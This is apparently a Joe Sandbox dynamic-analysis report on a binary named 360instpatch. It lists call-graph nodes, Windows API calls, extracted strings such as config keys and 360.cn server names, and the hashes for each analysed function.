75 API calls 152396->152397 152398 6bf2e1b9 152397->152398 152646 6beef7ae 152398->152646 152400 6bf2e1cf 152926 6bf3074a 152438->152926 152442 6bf2e3ce 152445 6bf2e3e1 152446 6bf2e410 closesocket 152445->152446 152447 6bf2e425 152445->152447 152950 6bf34a9e 6 API calls 152445->152950 152446->152445 152446->152447 152447->152354 152449 6bf2c56b 114 API calls 152448->152449 152450 6bf2d25d 152449->152450 152451 6bf2ca48 ctype 6 API calls 152450->152451 152452 6bf2d26f 152451->152452 152984 6bf2d1c5 152452->152984 152507 6bf3711b 152506->152507 152513 6bf3717d ctype 152506->152513 152508 6bf37483 152507->152508 152509 6bf37122 GetTickCount 152507->152509 152510 6bf37182 GetTickCount 152507->152510 152511 6bf372b2 GetTickCount 152507->152511 152512 6bf37447 ctype 152507->152512 152507->152513 152514 6bf3738f ctype 152507->152514 152515 6bf3749e 152507->152515 152516 6bf3723c GetTickCount 152507->152516 152517 6bf373ec GetTickCount 152507->152517 153100 6bf33c06 114 API calls 152508->153100 152524 6bf37c17 8 API calls 152509->152524 152522 6bf3719f 152510->152522 152551 6bf37171 152510->152551 152525 6bf372c6 152511->152525 152571 6bf37308 moneypunct ctype 152511->152571 152521 6bf37456 inet_addr htonl 152512->152521 152513->152354 152526 6bf3739f inet_addr htonl 152514->152526 153103 6bf33c06 114 API calls 152515->153103 152518 6bf37255 152516->152518 152519 6bf37288 152516->152519 152523 6bf37400 152517->152523 152530 6bf37210 moneypunct ctype 152517->152530 152523->152530 152530->152513 152579 6bf32f9f __EH_prolog3 152578->152579 152580 6bf33027 152579->152580 152581 6bf32fab htonl 152579->152581 152583 6bf3303d std::runtime_error::runtime_error ctype 152580->152583 153113 6bf32476 152580->153113 152582 6befb865 ctype 111 API calls 152581->152582 152583->152354 152596 6bf33031 152595->152596 152597 6bf32476 122 API calls 152596->152597 152598 6bf33036 152597->152598 152602 6bf17a3f __EH_prolog3 152601->152602 152603 6bf17b70 152602->152603 152604 6bf17a58 
152602->152604 152633 6bf2fe57 152632->152633 152634 6bf2fe5f connect 152632->152634 152633->152634 152634->152354 152635->152354 152636->152354 152637->152354 152638->152354 152639->152382 152641 6bf2c5b3 GetTickCount 152640->152641 152642 6bf2c57c GetTickCount 152640->152642 152641->152396 152643 6bf2c5af 152642->152643 152644 6bf2c595 GetTickCount 152642->152644 152643->152641 152736 6bf23fed 111 API calls 3 library calls 152644->152736 152647 6beef7c0 152646->152647 152649 6beef7c5 152646->152649 152737 6bef8e9e 75 API calls 4 library calls 152647->152737 152650 6bee7c8f 75 API calls 152649->152650 152657 6beef80b ctype 152649->152657 152651 6beef7db 152650->152651 152657->152400 152736->152643 152927 6bf30767 152926->152927 152928 6bf3076c WSASetLastError 152927->152928 152951 6bf305f0 152927->152951 152934 6bf3077b 152928->152934 152931 6bf30787 152931->152928 152932 6bf30792 152931->152932 152932->152934 152935 6bf307af socket 152932->152935 152933 6bf384d6 _strlwr_s_l_stat 5 API calls 152936 6bf2e3bc 152933->152936 152934->152933 152936->152445 152948 6bf2e055 122 API calls ctype 152936->152948 152948->152442 152950->152445 152952 6bf305fc __EH_prolog3 152951->152952 152953 6bf3060c GetCurrentThreadId EnterCriticalSection 152952->152953 152955 6bf30604 std::runtime_error::runtime_error 152952->152955 152954 6bf3067d 152953->152954 152957 6bf3062b 152953->152957 152956 6bf38425 ctype 75 API calls 152954->152956 152955->152931 152959 6bf30684 152956->152959 152961 6bf38425 ctype 75 API calls 152957->152961 152969 6bf30673 LeaveCriticalSection 152957->152969 152963 6bf30640 152961->152963 152969->152955 152993 6bf2d105 152984->152993 153103->152513 153168 6beeb995 153173 6beeb3f0 153168->153173 153171 6beeb9b0 153172 6beea564 FreeLibraryAndExitThread 153172->153171 153181 6beeb402 _memset __write_nolock ___TypeMatch 153173->153181 153174 6beeb970 153175 6bf384d6 _strlwr_s_l_stat 5 API calls 153174->153175 153176 6beeb98d 153175->153176 153176->153171 
153176->153172 153177 6beeb547 153245 6beeac64 239 API calls ctype 153177->153245 153178 6beeb717 inet_addr 153184 6beeb731 gethostbyname 153178->153184 153181->153174 153181->153177 153182 6beeb5a1 153181->153182 153185 6beeb49c 153181->153185 153182->153178 153183 6beeb5da 153182->153183 153246 6beeaf47 148 API calls 8 library calls 153183->153246 153191 6beeb83c _memset 153184->153191 153192 6beeb76d std::runtime_error::~runtime_error 153184->153192 153228 6bf325d6 153185->153228 153242 6bf33cfe 153185->153242 153188 6beeb5ef 153189 6beeb5f9 _memset 153188->153189 153190 6beeb714 153188->153190 153247 6bf23d26 MultiByteToWideChar MultiByteToWideChar 153189->153247 153190->153178 153254 6bf23d26 MultiByteToWideChar MultiByteToWideChar 153191->153254 153193 6beeb7e1 153192->153193 153250 6beeaf2a 75 API calls 2 library calls 153192->153250 153193->153185 153193->153191 153198 6beeb814 inet_addr 153193->153198 153194 6beeb562 153259 6beeaf07 67 API calls 2 library calls 153194->153259 153198->153185 153198->153191 153199 6beeb875 153210 6beeb889 153199->153210 153255 6befba20 75 API calls 2 library calls 153199->153255 153201 6beeb79b 153251 6beeaf2a 75 API calls 2 library calls 153201->153251 153205 6beeb7a8 153252 6beeaf2a 75 API calls 2 library calls 153205->153252 153206 6beeb673 gethostbyname 153206->153185 153224 6beeb694 153206->153224 153208 6beeb8d6 153208->153185 153217 6beeb919 153208->153217 153209 6beeb637 153209->153206 153218 6bf23f0c 111 API calls 153209->153218 153248 6bf23d67 103 API calls __snwprintf 153209->153248 153256 6befba20 75 API calls 2 library calls 153210->153256 153211 6beeb7b2 153253 6bf0ea0d 121 API calls 153211->153253 153214 6beeb8b7 153214->153208 153257 6beeac64 239 API calls ctype 153214->153257 153218->153209 153222 6beeb6fe 153222->153185 153224->153185 153224->153222 153225 6bf23f0c 111 API calls 153224->153225 153249 6bf23d67 103 API calls __snwprintf 153224->153249 153225->153224 153229 6bf325e1 153228->153229 153230 
6bf32637 153228->153230 153260 6bf32243 153229->153260 153231 6bf38425 ctype 75 API calls 153230->153231 153234 6bf3263e 153231->153234 153237 6bf31cb9 76 API calls 153234->153237 153235 6bf38425 ctype 75 API calls 153236 6bf325f6 153235->153236 153239 6befac19 68 API calls 153236->153239 153238 6bf32634 ctype 153237->153238 153238->153194 153240 6bf32610 htonl 153239->153240 153243 6bf37b9f 76 API calls 153242->153243 153244 6bf33d12 153243->153244 153244->153194 153245->153194 153246->153188 153247->153209 153248->153209 153249->153224 153250->153201 153251->153205 153252->153211 153254->153199 153255->153210 153256->153214 153257->153208 153259->153174 153263 6bf32273 _memset _strcat __mbschr_l 153260->153263 153265 6bf322b3 153260->153265 153261 6bf384d6 _strlwr_s_l_stat 5 API calls 153262 6bf322dd 153261->153262 153262->153235 153263->153265 153266 6bf3d885 91 API calls strtoxl 153263->153266 153265->153261 153266->153265 153267 b53f4a 153268 b53f55 153267->153268 153269 b53f68 GetWindowLongW 153267->153269 153276 b53ee0 CallWindowProcW 153268->153276 153277 b53ee0 CallWindowProcW 153269->153277 153272 b53f87 153273 b53f95 GetWindowLongW 153272->153273 153275 b53f63 153272->153275 153274 b53fa2 SetWindowLongW 153273->153274 153273->153275 153274->153275 153276->153275 153277->153272

Control-flow Graph (first block: 6bf0fe46-6bf0fe5d)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BEFAF8A: GetFileAttributesW.KERNEL32(000000FF,6BF0FE4F,?,00000001,00000000,00000000,00000000,000000FF,00000001,6BFCC288,00000000), ref: 6BEFAF8E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0FED6
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF0FF03
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0FF38
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF0FF76
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF0FFAC
                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(EntClient,TRPort,00000050,?), ref: 6BF0FFDB
                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(EntClient,EntNat,000000FF,?), ref: 6BF0FFF7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF10014
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF1003D
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF10076
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF100B4
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF100EA
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF10115
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF10142
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF10165
                                                                                                                                                                                                                • Part of subcall function 6BF23CE4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,0000083F,?,00000000,?,6BF23E87,?,?,0000083F), ref: 6BF23CFD
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF101A3
                                                                                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 6BF101D9
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF1020C
                                                                                                                                                                                                              • __wcslwr.LIBCMT ref: 6BF10227
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 6BF102E0
                                                                                                                                                                                                                • Part of subcall function 6BF04C30: __EH_prolog3.LIBCMT ref: 6BF04C37
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
• Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsetinet_addr$_wcslen$PrivateProfile$AttributesByteCharFileH_prolog3MultiWide__wcslwrwsprintf
                                                                                                                                                                                                              • String ID: "$EntClient$EntNat$FIVESIZE$P2PHAVESIZE$PdownList$PolicyControl%d$SDServer$SINGLESIZE$STServer$TRPort$TRServer$[CTaskMgr::__update_config] PdownList:%s$[CTaskMgr::__update_config] STServer:%s$[CTaskMgr::__update_config] TRServer:%s$\360EntClient_download.ini$\livep.dat
                                                                                                                                                                                                              • API String ID: 1263679763-4273410730
                                                                                                                                                                                                              • Opcode ID: 8bb4d192d8c301a36884dcb9b270d9320bbf21e4eaf70434efd4993b0ad08e53
                                                                                                                                                                                                              • Instruction ID: cce873792bd0efa49f1aed7b7fde472959aed5d4b881844fb0e829c9cf6f032d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bb4d192d8c301a36884dcb9b270d9320bbf21e4eaf70434efd4993b0ad08e53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51F1F17380424AABDB21DFB4CC55FEE37A8EF05314F100529F918EB1A1EB7DA65587A0

Control-flow Graph (first block: 6bf0f494-6bf0f4cc)
APIs
• __EH_prolog3.LIBCMT ref: 6BF0F4B3
• GetTickCount.KERNEL32 ref: 6BF0F4BA
• WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 6BF0F573
• CloseHandle.KERNEL32(00000000), ref: 6BF0F588
  • Part of subcall function 6BF2D2AB: __EH_prolog3.LIBCMT ref: 6BF2D2B2
  • Part of subcall function 6BF2D2AB: std::runtime_error::runtime_error.LIBCPMT ref: 6BF2D2DB
  • Part of subcall function 6BF2D2AB: __CxxThrowException@8.LIBCMT ref: 6BF2D2F0
• _memset.LIBCMT ref: 6BF0F730
• RegQueryValueExW.ADVAPI32(00000000,LastUploadDate,00000000,?,00000000,?,?,?,?), ref: 6BF0F79E
• RegQueryValueExW.ADVAPI32(?,LastUploadTime,00000000,?,00000000,?), ref: 6BF0F7CC
• RegQueryValueExW.ADVAPI32(?,LastUploadTraffic,00000000,?,00000000,?), ref: 6BF0F7FA
• RegQueryValueExW.ADVAPI32(?,LastDownTraffic,00000000,?,00000000,?), ref: 6BF0F828
• RegQueryValueExW.ADVAPI32(?,CurUploadTime,00000000,?,00000000,?), ref: 6BF0F856
• RegQueryValueExW.ADVAPI32(?,CurUploadTraffic,00000000,?,00000000,?), ref: 6BF0F884
• RegQueryValueExW.ADVAPI32(?,CurDownTraffic,00000000,?,00000000,?), ref: 6BF0F8B2
• RegCloseKey.ADVAPI32(?), ref: 6BF0F8C3
• __time64.LIBCMT ref: 6BF0FA31
• __time64.LIBCMT ref: 6BF0F653
  • Part of subcall function 6BF3AE62: GetSystemTimeAsFileTime.KERNEL32(6BFCC3F0,?,?,?,6BF0EABC,00000000,?,6BFCC3F0,6BFCC288), ref: 6BF3AE6D
  • Part of subcall function 6BF3AE62: __aulldiv.LIBCMT ref: 6BF3AE8D
• __time64.LIBCMT ref: 6BF0FA88
Strings
Memory Dump Source
• Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
• Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
Similarity
• API ID: QueryValue$__time64$CloseH_prolog3Time$CountException@8FileHandleObjectSingleSystemThrowTickWait__aulldiv_memsetstd::runtime_error::runtime_error
• String ID: CurDownTraffic$CurUploadTime$CurUploadTraffic$LastDownTraffic$LastUploadDate$LastUploadTime$LastUploadTraffic$MaxDnSpeed$MaxUpSpeed$MaxUpUpdate$NonUrgentMode$reg NonUrgentMode:%d$reg NonUrgentMode:%d timeout
• API String ID: 4167386882-1126348924
• Opcode ID: 0d1b58e22d42c7f7d36a7813d42600fec161e0a585095352ee593f05628bb5f5
• Instruction ID: b65351afd0fae905322359a5c42e4bad3aa250b98a4d86d1a4eef8b3a8f7d906
• Opcode Fuzzy Hash: 0d1b58e22d42c7f7d36a7813d42600fec161e0a585095352ee593f05628bb5f5
• Instruction Fuzzy Hash: D8126D72D0020A9FDB54CFA4C9A1AEEB7F9FF45304F10452AE511E7270EB38A949DB64

APIs
• _wcspbrk.LIBCMT ref: 6BF3A712
  • Part of subcall function 6BF3DC9F: __getptd_noexit.LIBCMT ref: 6BF3DC9F
  • Part of subcall function 6BF3DC8C: __getptd_noexit.LIBCMT ref: 6BF3DC8C
  • Part of subcall function 6BF38356: __decode_pointer.LIBCMT ref: 6BF38361
Strings
Memory Dump Source
• Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
• Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
Similarity
• API ID: __getptd_noexit$__decode_pointer_wcspbrk
• String ID: ./\
• API String ID: 2357261805-3176372042
• Opcode ID: 88aaf532330191210f0140fc9a7030479d349ff39c575dff9ff329e563e63cdd
• Instruction ID: b3918ca0e73b74166d0c01065a82c81c9342231f069debf9840ee903ef2d184c
• Opcode Fuzzy Hash: 88aaf532330191210f0140fc9a7030479d349ff39c575dff9ff329e563e63cdd
• Instruction Fuzzy Hash: 28C134F3804539DADF209F65CC44A9DB7F8BF09714F0041EAE658D2561E7399A80CFA9
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
• Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
Similarity
• API ID: _memset$gethostbynameinet_addr
• String ID: 127.0.0.1$[DNS_ResolvHost] local resolve [%s] ip:%s$[DNS_ResolvHost] proxy resolve [%s] ip:%s$sd.p.360.cn$st.p.360.cn$tr.p.360.cn
• API String ID: 771635252-1090227531
• Opcode ID: a1ec6a9aa073ba1d3ef5c4151e0ce3e1ae934b5bda9eafcad429839ac263f697
• Instruction ID: 2d53c3f2f00ef5ec3b5126c95bc82daf9b39fd8c4507b14cd8e69d6ba1e858cb
• Opcode Fuzzy Hash: a1ec6a9aa073ba1d3ef5c4151e0ce3e1ae934b5bda9eafcad429839ac263f697
• Instruction Fuzzy Hash: 8502B172D00705DBDB34CE78D8C0BAA73B9FB45704F200A6DE55686690E739E99ACB31
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(000200E8,?), ref: 6BEE7A3A
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 6BEE7A41
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE7A4B
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 6BEE7A5B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BEE7A68
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 6BEE7A9C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BEE7AA9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE7AAF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BEE7AB7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
• Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 270471142-0
                                                                                                                                                                                                              • Opcode ID: 54d12814f5e272c9f7efca15d8b34012dcd4cbb24d0f9fa9d91314aed9834ed8
                                                                                                                                                                                                              • Instruction ID: 60d9425859b03c950156ebde5aacc983bf2845aa9dc4bd9aec333e371a0142e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54d12814f5e272c9f7efca15d8b34012dcd4cbb24d0f9fa9d91314aed9834ed8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87113072910208EFDF40EFA8C848AAFBBB8EB56711B548095F509E2111E734DA4ADB70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B22750: _vswprintf_s.LIBCMT ref: 00B22783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00B92292
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00B922D8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B922E3
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B92358
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B923D3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
                                                                                                                                                                                                              • String ID: GenuineIntel:0f8bfbff$\\.\PhysicalDrive%d
                                                                                                                                                                                                              • API String ID: 759969516-2564646230
                                                                                                                                                                                                              • Opcode ID: dede7a64959240cd052320865eedc5a966c0f77dff32e7c560d310935a702aaf
                                                                                                                                                                                                              • Instruction ID: bdd62cda11430a26417ea507855e74659386048f14406c08ca13f14efcc3a900
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dede7a64959240cd052320865eedc5a966c0f77dff32e7c560d310935a702aaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E51B0B0909340AFD760CF24CC81BABBBE8EB89705F40496DF699D7281E77499058F5B
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B82177
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 00B821BD
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B821DF
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(?,0004D030,?,00000028,?,00000028,?,00000000), ref: 00B82236
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B8226C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000038), ref: 00B822A9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$CloseControlCreateDeviceFileH_prolog3Handle
                                                                                                                                                                                                              • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                                                              • API String ID: 1408917728-613073274
                                                                                                                                                                                                              • Opcode ID: fd75c50ef6adb755a87e45675c3ffb7147e72aea2f356827ecd350597da02336
                                                                                                                                                                                                              • Instruction ID: 1e697555e5cf013a99a4001aa7287d4f5416c7b468e4f52b7a8d9e007455f401
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd75c50ef6adb755a87e45675c3ffb7147e72aea2f356827ecd350597da02336
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14417FB190024CAFDF21EFA4DC46EEE77B8EF48704F00056AF915A7291EB349A05CB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CD3D57F: FindClose.KERNEL32(?,?,6CD3E2C1,?,?,00000000,6CD4DE81,?,?,?,?,?,?,00000034), ref: 6CD3D599
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000034), ref: 6CD3E2E3
                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000034), ref: 6CD3E300
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,00000034), ref: 6CD3E313
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000,6CD4DE81,?,?,?,?,?,?,00000034), ref: 6CD3E31E
                                                                                                                                                                                                              • _wcsrchr.LIBCMT ref: 6CD3E32F
                                                                                                                                                                                                              • _wcsrchr.LIBCMT ref: 6CD3E339
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
• Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                              • API String ID: 3086268848-438819550
                                                                                                                                                                                                              • Opcode ID: c67cb2fde4d89d3c98ac2cc17608ab03f6ec0a969a955aacbcc4bf0690b7e7cd
                                                                                                                                                                                                              • Instruction ID: b398e56836c64a7972a4f3bb3afb69803640ef1c30f22b5a9151f5e362c3267e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67cb2fde4d89d3c98ac2cc17608ab03f6ec0a969a955aacbcc4bf0690b7e7cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A11E2617553249BD3106B714C84B5B32BC9F4734AF041939EA5EDAFE1E770A8048BF4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B22750: _vswprintf_s.LIBCMT ref: 00B22783
